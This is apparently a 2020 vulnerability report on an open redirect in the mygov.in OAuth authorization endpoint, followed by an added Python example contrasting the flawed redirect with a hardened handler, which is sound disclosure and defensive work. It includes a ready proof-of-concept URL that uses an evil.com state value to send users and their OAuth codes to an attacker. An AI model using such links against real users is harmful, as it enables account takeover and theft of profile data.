Published on Aug. 30, 2020, 6:38 a.m.
Reported on https://auth.mygov.in/
Open redirection with OAuth code leakage in the Indian government's mygov.in web app. The URL https://auth.mygov.in/oauth2/authorize?response_type=code&client_id=MyGovStartUpIndia&redirect_uri=http://api.startupindia.gov.in/sih/api/noauth/oauth2/code/recieve&scope=user_profile&state=https://evil.com/ will redirect a mygov.in user to evil.com after that user logs in with correct credentials. This makes the attack more effective because the attacker can redirect real users who have an account on mygov.in, and the attacker's site will also get access to the user's profile via the OAuth code.
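The root cause described above is an authorization endpoint that treats the `state` parameter as a location instead of an opaque value and does not pin the final redirect to the client's registered `redirect_uri`. The following is an added example (not code from the report or from mygov.in) showing that vulnerable post-login pattern next to a hardened authorize handler; the client registry, the `issue_code` callback and the `example.invalid` callback URL are constructed for illustration.

```python
"""Added example: opaque `state` plus exact-match redirect_uri validation
for an OAuth 2.0 authorization-code endpoint. Not the report's own code."""
from urllib.parse import urlencode, urlsplit, urlunsplit

# Constructed client registry: every redirect URI a client may use, pre-registered.
REGISTERED_CLIENTS = {
    "MyGovStartUpIndia": {
        "https://api.example.invalid/oauth2/code/receive",  # constructed callback
    },
}


def vulnerable_post_login_redirect(params):
    """The flaw the report describes: after login the server sends the browser
    wherever `state` points, so any URL placed in `state` is an open redirect."""
    return params["state"]


def safe_authorize(params, issue_code):
    """Return the post-login redirect target, or None if the request is rejected.
    `issue_code` is a hypothetical callback that mints a fresh authorization code."""
    client = REGISTERED_CLIENTS.get(params.get("client_id"))
    if client is None:
        return None
    if params.get("response_type") != "code":
        return None
    redirect_uri = params.get("redirect_uri", "")
    # Exact string comparison against the registered set: no prefix, substring
    # or host-only matching, so an attacker-chosen URI is never accepted.
    if redirect_uri not in client:
        return None
    # `state` is echoed back verbatim as a query parameter for the client to
    # verify its own CSRF token; it is never interpreted as a location.
    query = {"code": issue_code()}
    state = params.get("state")
    if state:
        query["state"] = state
    parts = urlsplit(redirect_uri)
    joined = parts.query + ("&" if parts.query else "") + urlencode(query)
    return urlunsplit(parts._replace(query=joined))
```

With the request from the report, `vulnerable_post_login_redirect` yields `https://evil.com/`, while `safe_authorize` only ever returns the registered callback URL with the code and the untouched `state` appended.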
Bug Type: Security
Status:
Reported On: Aug. 30, 2020, 6:38 a.m.
Submitted: Independently
Browser Version: 68.0
Operating System: Linux
OS Version: Unknown